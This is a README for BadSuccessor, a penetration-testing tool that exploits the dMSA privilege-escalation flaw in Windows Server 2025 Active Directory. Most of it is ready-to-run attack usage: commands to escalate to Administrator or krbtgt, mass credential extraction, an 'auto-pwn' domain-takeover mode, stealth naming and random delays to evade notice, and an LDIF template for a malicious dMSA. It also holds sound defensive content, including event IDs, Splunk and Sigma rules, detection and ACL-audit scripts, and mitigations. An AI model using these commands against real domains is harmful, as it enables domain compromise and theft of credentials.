A penetration testing tool that exploits the dMSA (delegated Managed Service Account) privilege escalation vulnerability in Windows Server 2025 Active Directory environments.
This tool is for authorized penetration testing and security research purposes only. Use of this tool against systems without explicit written permission is illegal and unethical. The authors are not responsible for any misuse or damage caused by this tool.
IMPORTANT: This tool is under active development and testing.
- Windows Server 2025 Adoption: As of May 2025, Windows Server 2025 is still in early adoption phase with limited production deployments
- Environmental Variations: Due to the limited number of Windows Server 2025 environments available for testing, this tool may encounter untested configurations
- Ongoing Development: We are actively refining the tool as more environmental variations are deployed and tested
- Expect Updates: The tool will receive frequent updates as new environment types are tested
- Report Issues: Your feedback is crucial - please report any issues or edge cases you encounter
- Test Carefully: Always test in a non-production environment first
- Schema Variations: Different Windows Server 2025 builds may implement dMSA attributes differently
- Feature Stability: While core functionality is stable, some features may require adjustment for specific environments
- Different Windows Server 2025 build versions
- Schema attribute naming conventions
- Regional/localized AD implementations
- Hybrid cloud configurations
- Various AD functional levels
- Different security hardening configurations
We encourage the security community to:
- Test in diverse environments
- Share findings (sanitized)
- Submit pull requests for compatibility improvements
- Report environmental variations
By using this tool, you acknowledge that it is under active development and may require modifications for your specific environment.
BadSuccessor exploits a privilege escalation vulnerability in Windows Server 2025's delegated Managed Service Account (dMSA) feature. The vulnerability allows attackers with minimal permissions to escalate privileges to any user in the domain, including Domain Administrators.
This tool is based on the excellent research by Yuval Gordon from Akamai Technologies:
The vulnerability exists in the dMSA migration process where:
- An attacker creates a malicious dMSA in any writable OU
- Sets `msDS-ManagedAccountPrecededByLink` or `ms-DS-Managed-Account-Preceded-By-Link` to point to a target user
- Sets `msDS-DelegatedMSAState` or `ms-DS-Delegated-MSA-State` to `2` (migration completed)
- The KDC automatically grants the dMSA all privileges of the target user via PAC inheritance
Additionally, the KERB-DMSA-KEY-PACKAGE structure contains the target user's password keys, enabling credential extraction.
- Linux machine (non-domain joined)
- Python 3.6+
- Network access to target Active Directory environment
- Target domain must have at least one Windows Server 2025 Domain Controller
pip3 install ldap3 pyasn1 pycryptodome
pip3 install impacket==0.12.0
Note: The tool has been tested with impacket 0.12.0. Version compatibility warnings are displayed at runtime.
# For DNS discovery
pip3 install dnspython
# For enhanced Kerberos support (system packages)
# Ubuntu/Debian
sudo apt-get install libkrb5-dev libgssapi-krb5-2
# RHEL/CentOS/Fedora
sudo yum install krb5-devel
- Valid domain credentials (any user account)
- ANY of the following permissions on at least one Organizational Unit:
  - `CreateChild` permission
  - `Write` permission
  - `GenericWrite` permission
  - `GenericAll` permission
- Member of default groups with write access (e.g., Authenticated Users)
- Tool automatically discovers all writable OUs and shows specific permissions
git clone https://github.com/cybrly/badsuccessor.git
cd badsuccessor
pip3 install -r requirements.txt
chmod +x badsuccessor.py
ldap3>=2.9.1
pyasn1>=0.4.8
pycryptodome>=3.15.0
impacket==0.12.0
dnspython>=2.1.0
python3 badsuccessor.py -d <domain> -u <username> -p <password> [options]
# Simulate attack to verify viability
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator
# Dry run with specific OU
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator --ou-dn "OU=ServiceAccounts,DC=corp,DC=local"
# Check Windows Server 2025 schema support
python3 badsuccessor.py -d corp.local -u john -p Password123 --check-schema
# Find ALL writable OUs with detailed permissions
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate
# List high-value targets
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-targets
# Validate specific target account
python3 badsuccessor.py -d corp.local -u john -p Password123 --validate-target Administrator
# Basic attack against Administrator
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator
# Stealth mode with innocuous naming
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator --stealth --random-delay 30
# Attack with custom dMSA attributes
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target krbtgt \
--dmsa-name legit_service --dmsa-description "Legitimate Service Account" \
--dmsa-display-name "Production Service"
# Attack with custom naming pattern
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator \
--dmsa-pattern "svc{random}prod"
# Extract credentials for multiple users
python3 badsuccessor.py -d corp.local -u john -p Password123 --extract-creds --targets Administrator,krbtgt,svc_sql
# Auto-pwn mode (fully automated)
python3 badsuccessor.py -d corp.local -u john -p Password123 --auto-pwn
# List all sessions
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-sessions
# Resume a previous session
python3 badsuccessor.py -d corp.local -u john -p Password123 --session-id corp.local_john_1234567890_abcd1234
# Clean up all dMSAs from a session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-session SESSION_ID
# Clean up all dMSAs from current session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-all
# Export enumeration results to JSON
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-json results.json
# Export to CSV
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-csv writable_ous.csv
# Generate HTML report
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-html report.html
# Combined operation with exports
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator \
  --export-json attack_results.json --export-html attack_report.html
Option | Description |
---|---|
-d, --domain | Target domain (e.g., corp.local) [REQUIRED] |
-u, --username | Username for authentication [REQUIRED] |
-p, --password | Password for authentication |
--dc-ip | Domain Controller IP (auto-discover if omitted) |
--ldaps | Force LDAPS (SSL) connection on port 636 |

Option | Description |
---|---|
--attack | Perform the BadSuccessor attack |
--dry-run | NEW: Simulate attack without making changes |
--extract-creds | Extract credentials using key package |
--auto-pwn | Fully automated domain takeover |

Option | Description |
---|---|
--target | Target user to escalate privileges to |
--targets | Comma-separated list of users for credential extraction |
--validate-target | NEW: Validate a target account without attacking |

Option | Description |
---|---|
--dmsa-name | Name for malicious dMSA (auto-generated if not specified) |
--dmsa-pattern | NEW: Pattern for dMSA naming (e.g., "svc{random}{target}") |
--ou-dn | Specific OU DN to use (auto-detect if not specified) |
--dmsa-description | NEW: Description for created dMSA |
--dmsa-display-name | NEW: Display name for created dMSA |

Option | Description |
---|---|
--enumerate | Enumerate OUs with ANY write permissions |
--list-targets | List high-value targets |
--check-schema | Verify Windows Server 2025 schema |

Option | Description |
---|---|
--session-id | Resume existing session |
--list-sessions | List all available sessions |
--cleanup-session SESSION_ID | Clean up all dMSAs from a session |

Option | Description |
---|---|
--cleanup | Remove created dMSA |
--dmsa-dn | dMSA DN for cleanup operations |
--cleanup-all | NEW: Clean up all dMSAs from current session |

Option | Description |
---|---|
--export-json FILE | NEW: Export results to JSON file |
--export-csv FILE | NEW: Export results to CSV file |
--export-html FILE | NEW: Generate HTML report |
--no-banner | Suppress banner output |
--verbose | Enable verbose output |

Option | Description |
---|---|
--stealth | Enable stealth mode (innocuous naming) |
--random-delay SECONDS | Random delay between operations (0-N seconds) |
- Schema Verification: Confirms Windows Server 2025 dMSA support with dynamic attribute detection
- Permission Discovery: Identifies OUs with ANY write access (not just CreateChild)
- Target Validation: NEW - Comprehensive target account analysis before attack
- Dry Run Option: NEW - Test attack viability without making changes
- dMSA Creation: Creates malicious dMSA with customizable attributes
- Attribute Manipulation: Sets predecessor link and migration state with schema awareness
- Session Tracking: NEW - All created objects tracked for easy cleanup
- Kerberos TGT Request: Obtains TGT with inherited privileges
- PAC Analysis: Verifies inherited group memberships
- Key Package Extraction: Enhanced parsing with multiple fallback methods
The tool provides ready-to-use commands for:
- DCSync attacks (dump all domain hashes)
- Remote command execution
- Lateral movement
- Persistence establishment
- Automatically detects which attribute naming convention your environment uses
- Supports all known variations of dMSA attributes
- Fallback mechanisms for different Windows Server 2025 builds
- Pre-attack validation of target accounts
- Detects disabled, locked, or expired accounts
- Warns about smartcard requirements and delegation restrictions
- Provides recommendations based on target properties
- Persistent session tracking across operations
- Resume interrupted attacks
- Bulk cleanup of all created dMSAs
- Session files stored securely with 0700 permissions
- Test attack viability without making any changes
- Validates schema, permissions, and target
- Reports exactly what would happen during a real attack
- Perfect for reconnaissance and planning
- Innocuous dMSA naming patterns that blend in
- Random delays between operations
- Customizable dMSA attributes (description, display name)
- Pattern-based naming with variables
- JSON export for integration with other tools
- CSV export for spreadsheet analysis
- HTML reports with styled output
- Structured data for all operations
- Comprehensive error messages with actionable solutions
- Graceful fallbacks for all operations
- Detailed logging with timestamp and severity
- Verbose mode for troubleshooting
- All features fully implemented (no placeholder code)
- Production-tested code structure
- Modular design with specialized classes
- Full compatibility with various AD configurations
Event ID | Source | Description |
---|---|---|
5137 | Security | Directory service object creation (dMSA) |
5136 | Security | Directory service object modification |
2946 | Directory Service | Group Managed Service Account authentication |
4768 | Security | Kerberos TGT requested |
4769 | Security | Kerberos service ticket requested |
# Splunk Query Example
index=windows EventCode=5137
| where ObjectClass="msDS-DelegatedManagedServiceAccount" OR ObjectClass="ms-DS-Delegated-Managed-Service-Account"
| where NOT user IN ("approved_admins")
```yaml
# Sigma Rule Example (minimal title/logsource added so the rule is complete)
title: dMSA Predecessor Link Modified
description: Detects writes to the dMSA predecessor link attribute under either naming convention
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 5136
    AttributeLDAPDisplayName:
      - 'msDS-ManagedAccountPrecededByLink'
      - 'ms-DS-Managed-Account-Preceded-By-Link'
  condition: selection
level: high
```
- Rapid creation and deletion of service accounts
- Non-administrative users creating dMSAs
- Unusual modifications to migration-related attributes
- Service accounts authenticating from unexpected sources
- dMSAs with suspicious naming patterns
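The Splunk query, the Sigma rule and the indicator list above can be combined into one correlation routine. The following is an added example, not code from the BadSuccessor tool: it runs over constructed, flattened 5137/5136 Security events (the `key=value; ...` line format and the `APPROVED_ADMINS` allow-list are assumptions), accepts both attribute naming conventions, and raises the severity when a freshly created dMSA receives a predecessor link and is then marked migration-complete.

```python
from datetime import datetime, timedelta

# Both class and attribute naming conventions seen across Windows Server 2025 builds
DMSA_CLASSES = {"msDS-DelegatedManagedServiceAccount", "ms-DS-Delegated-Managed-Service-Account"}
PRECEDED_BY_LINK = {"msDS-ManagedAccountPrecededByLink", "ms-DS-Managed-Account-Preceded-By-Link"}
DELEGATED_MSA_STATE = {"msDS-DelegatedMSAState", "ms-DS-Delegated-MSA-State"}
APPROVED_ADMINS = {"CORP\\svc_migration"}  # constructed allow-list of accounts permitted to create dMSAs

def parse_event(line):
    """Parse a constructed 'key=value; key=value' flattened Security event into a dict."""
    event = {}
    for part in line.split("; "):
        key, _, value = part.partition("=")  # DNs contain '=', so split on the first one only
        event[key.strip()] = value.strip()
    event["ts"] = datetime.fromisoformat(event["ts"])
    return event

def detect(lines, window=timedelta(minutes=10)):
    """Return (severity, subject, object_dn, reason) alerts for the BadSuccessor sequence."""
    events = sorted((parse_event(line) for line in lines), key=lambda e: e["ts"])
    alerts, created, linked = [], {}, set()
    for e in events:
        eid, subject, dn = e["EventID"], e["SubjectUserName"], e["ObjectDN"]
        if eid == "5137" and e["ObjectClass"] in DMSA_CLASSES:
            created[dn] = e["ts"]
            if subject not in APPROVED_ADMINS:
                alerts.append(("medium", subject, dn, "dMSA created by non-approved user"))
        elif eid == "5136":
            attr, value = e["AttributeLDAPDisplayName"], e["AttributeValue"]
            if attr in PRECEDED_BY_LINK:
                linked.add(dn)
                alerts.append(("high", subject, dn, "predecessor link set to " + value))
            elif attr in DELEGATED_MSA_STATE and value == "2":
                fresh = dn in created and e["ts"] - created[dn] <= window
                if dn in linked and fresh:
                    alerts.append(("critical", subject, dn,
                                   "new dMSA linked to a predecessor and marked migration-complete"))
                else:
                    alerts.append(("high", subject, dn, "migration state set to 2"))
    return alerts

# Constructed sample events: one approved dMSA creation, then the three-step attack sequence
SAMPLE_EVENTS = [
    "ts=2025-05-21T09:00:00; EventID=5137; SubjectUserName=CORP\\svc_migration; "
    "ObjectClass=msDS-DelegatedManagedServiceAccount; ObjectDN=CN=web01dmsa,OU=ServiceAccounts,DC=corp,DC=local",
    "ts=2025-05-21T10:00:00; EventID=5137; SubjectUserName=CORP\\john; "
    "ObjectClass=msDS-DelegatedManagedServiceAccount; ObjectDN=CN=svc_x8k2prod,OU=ServiceAccounts,DC=corp,DC=local",
    "ts=2025-05-21T10:00:05; EventID=5136; SubjectUserName=CORP\\john; "
    "ObjectDN=CN=svc_x8k2prod,OU=ServiceAccounts,DC=corp,DC=local; "
    "AttributeLDAPDisplayName=ms-DS-Managed-Account-Preceded-By-Link; AttributeValue=CN=Administrator,CN=Users,DC=corp,DC=local",
    "ts=2025-05-21T10:00:07; EventID=5136; SubjectUserName=CORP\\john; "
    "ObjectDN=CN=svc_x8k2prod,OU=ServiceAccounts,DC=corp,DC=local; "
    "AttributeLDAPDisplayName=msDS-DelegatedMSAState; AttributeValue=2",
]
```

Real 5136 events also carry an OperationType (value added/deleted); a production version should ignore the delete half of a modify so cleanup does not double-alert.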
- Restrict OU Permissions

# Remove ALL write permissions from non-admin users
Remove-ADPermission -Identity "OU=ServiceAccounts,DC=corp,DC=local" -User "Domain Users" -AccessRights CreateChild,Write,GenericWrite,GenericAll
# Check for default group permissions
Get-ADPermission -Identity "OU=ServiceAccounts,DC=corp,DC=local" | Where-Object {$_.IdentityReference -match "Authenticated Users|Everyone"}

- Monitor dMSA Operations

# Enable auditing on dMSA attributes (both naming conventions)
Set-ADObject -Identity "CN=Schema,CN=Configuration,DC=corp,DC=local" -Add @{ 'msDS-ReplAttributeMetaData' = @('msDS-ManagedAccountPrecededByLink', 'ms-DS-Managed-Account-Preceded-By-Link') }

- Implement Detection
  - Deploy provided detection rules
  - Alert on Event ID 2946 with S-1-5-7 caller
  - Monitor attribute modifications
  - Track dMSA creation patterns
- Apply Microsoft patches when available
- Regular permission audits (check ALL write permissions, not just CreateChild)
- Principle of least privilege enforcement
- Consider disabling dMSA if not required
- Implement approval workflow for service account creation
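The "Restrict OU Permissions" step and the "regular permission audits" recommendation both need a check that covers every write-like right, not just CreateChild. The following added example (not part of BadSuccessor or of the cmdlets above) audits an exported SDDL security descriptor of an OU and reports allow ACEs that grant such rights to broad default groups; the SDDL string and the object-type GUID are constructed, and trustees given as full `S-1-5-...` SIDs rather than two-letter abbreviations would have to be resolved first.

```python
import re

# Active Directory access-mask bits and their two-letter SDDL codes
RIGHT_BITS = {"CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
              "DT": 0x40, "LO": 0x80, "CR": 0x100, "SD": 0x10000, "RC": 0x20000,
              "WD": 0x40000, "WO": 0x80000, "GA": 0x10000000, "GX": 0x20000000,
              "GW": 0x40000000, "GR": 0x80000000}
# Rights that allow creating a dMSA under the OU or rewriting objects beneath it
WRITE_LIKE = {"CC", "WP", "SW", "GW", "GA", "WD", "WO"}
# Broad well-known principals (SDDL abbreviations) that should not hold those rights on an OU
BROAD_PRINCIPALS = {"AU": "Authenticated Users", "WD": "Everyone",
                    "DU": "Domain Users", "BU": "Users"}
DACL_RE = re.compile(r"D:[A-Z]*((?:\([^()]*\))*)")
ACE_RE = re.compile(r"\(([^()]*)\)")

def rights_from_sddl(token):
    """Expand an SDDL rights field (hex mask or concatenated 2-letter codes) into a set of codes."""
    if token.upper().startswith("0X"):
        mask = int(token, 16)
        return {code for code, bit in RIGHT_BITS.items() if mask & bit}
    return {token[i:i + 2].upper() for i in range(0, len(token), 2)}

def risky_aces(sddl):
    """Return (principal, sorted rights, object type) for allow ACEs giving write-like rights to broad groups."""
    findings = []
    match = DACL_RE.search(sddl)
    for ace in ACE_RE.finditer(match.group(1) if match else ""):
        parts = ace.group(1).split(";")
        if len(parts) < 6:
            continue
        ace_type, _flags, rights, obj_type, _inherit, trustee = parts[:6]
        if ace_type not in ("A", "OA"):  # only allow / object-allow ACEs grant access
            continue
        granted = rights_from_sddl(rights) & WRITE_LIKE
        if granted and trustee in BROAD_PRINCIPALS:
            findings.append((BROAD_PRINCIPALS[trustee], sorted(granted), obj_type or "*"))
    return findings

# Constructed descriptor: read-only for Authenticated Users, CreateChild of one object type for
# Domain Users, WriteProperty (0x20) for Everyone, full control for Domain Admins
SAMPLE_SDDL = ("O:DAG:DAD:AI(A;;RPLCLORC;;;AU)"
               "(OA;;CC;placeholder-object-type-guid;;DU)"
               "(A;;0x20;;;WD)"
               "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)")
```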
Based on Akamai's research:
- 91% of environments have vulnerable permissions
- Works on default configurations
- Affects organizations with Windows Server 2025 DCs
- No patches currently available
dn: CN=evil_dmsa,OU=ServiceAccounts,DC=corp,DC=local
objectClass: top
objectClass: msDS-GroupManagedServiceAccount
objectClass: msDS-DelegatedManagedServiceAccount
sAMAccountName: evil_dmsa$
userAccountControl: 4096
# Note: Your environment may use either format below
msDS-ManagedAccountPrecededByLink: CN=Administrator,CN=Users,DC=corp,DC=local
# OR
ms-DS-Managed-Account-Preceded-By-Link: CN=Administrator,CN=Users,DC=corp,DC=local
msDS-DelegatedMSAState: 2
msDS-SupportedEncryptionTypes: 28
The KERB-DMSA-KEY-PACKAGE contains:
- Current keys: dMSA's encryption keys
- Previous keys: Target user's encryption keys (including NTLM hash)
- Enables direct credential extraction without password cracking
Contributions are welcome! Please:
- Fork the repository
- Create a feature branch (`git checkout -b feature/enhancement`)
- Commit changes (`git commit -m 'Add new feature'`)
- Push to branch (`git push origin feature/enhancement`)
- Submit a Pull Request
- Follow PEP 8 style guide
- Add unit tests for new features
- Update documentation
- Test against multiple AD environments
- Test with different schema attribute naming conventions
- Ensure all features are production-ready (no placeholders)
- NEW: Dry run mode for safe attack simulation
- NEW: Comprehensive session management with state persistence
- NEW: Target account validation with detailed analysis
- NEW: Export capabilities (JSON, CSV, HTML)
- NEW: Stealth mode with innocuous naming patterns
- NEW: Customizable dMSA attributes (description, display name)
- NEW: Pattern-based dMSA naming with variables
- NEW: Random delay support for stealth operations
- NEW: Dynamic schema attribute detection
- NEW: Enhanced key package parsing with fallbacks
- NEW: Bulk cleanup operations
- NEW: Professional error handling and logging
- IMPROVED: Complete modular architecture
- IMPROVED: Version checking for dependencies
- FIXED: All placeholder code replaced with full implementations
- FIXED: Resolved impacket import issues (removed seq_decode dependency)
- FIXED: Compatible with impacket 0.12.0
- FEATURE: Added support for both dMSA attribute naming conventions
- IMPROVED: Better error handling for import failures
- IMPROVED: More robust schema detection
- MAJOR: Enhanced ACL permission checking - now detects ALL write permissions
- MAJOR: Added support for default groups (Authenticated Users, Everyone, etc.)
- FIXED: Removed all placeholder code
- FIXED: Complete implementation of all features
- IMPROVED: Better error handling and informative output
- IMPROVED: More comprehensive OU enumeration (includes containers)
- FEATURE: Shows exact permissions for each discovered OU
- FEATURE: Detects protected users and delegation restrictions
- Major: Full Kerberos authentication implementation
- Major: KERB-DMSA-KEY-PACKAGE extraction for credential theft
- Major: Basic ACL permission checking
- Major: Windows Server 2025 schema verification
- Feature: Mass credential extraction mode
- Feature: Auto-pwn for automated domain takeover
- Feature: Enhanced target enumeration
- Feature: Post-exploitation command generation
- Improvement: Better error handling and logging
- Improvement: Production-ready code structure
- Original Akamai Research
- GitHub Issue #1 - Enhanced Permission Checking
- GitHub Issue #2 - Schema Attribute Naming
- Microsoft Security Response Center
- Some environments may use different attribute naming conventions (handled by dynamic detection)
- Hash authentication requires password for initial implementation
- Some environments may require manual Kerberos configuration
- Detection rules need customization per environment
If you encounter import errors with impacket:
# Ensure you have the correct version
pip3 uninstall impacket
pip3 install impacket==0.12.0
# Check version
python3 -c "import impacket; print(impacket.__version__)"
The tool now includes dynamic schema detection. If it still fails:
# On Domain Controller - Check actual attribute names
Get-ADObject -Filter {name -like "*delegated*" -or name -like "*preceded*"} -SearchBase "CN=Schema,CN=Configuration,DC=corp,DC=local" | Select Name
Use the new dry-run mode to test:
# Test without making changes
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator
# Check your exact permissions
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --verbose
# List sessions
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-sessions
# Clean up stale sessions
rm -rf /tmp/.badsuccessor_sessions/
For questions, issues, or responsible disclosure:
- Open a GitHub Issue
- Follow responsible disclosure practices
- Allow 90 days for patch development
Remember: With great power comes great responsibility. Always obtain proper authorization before testing!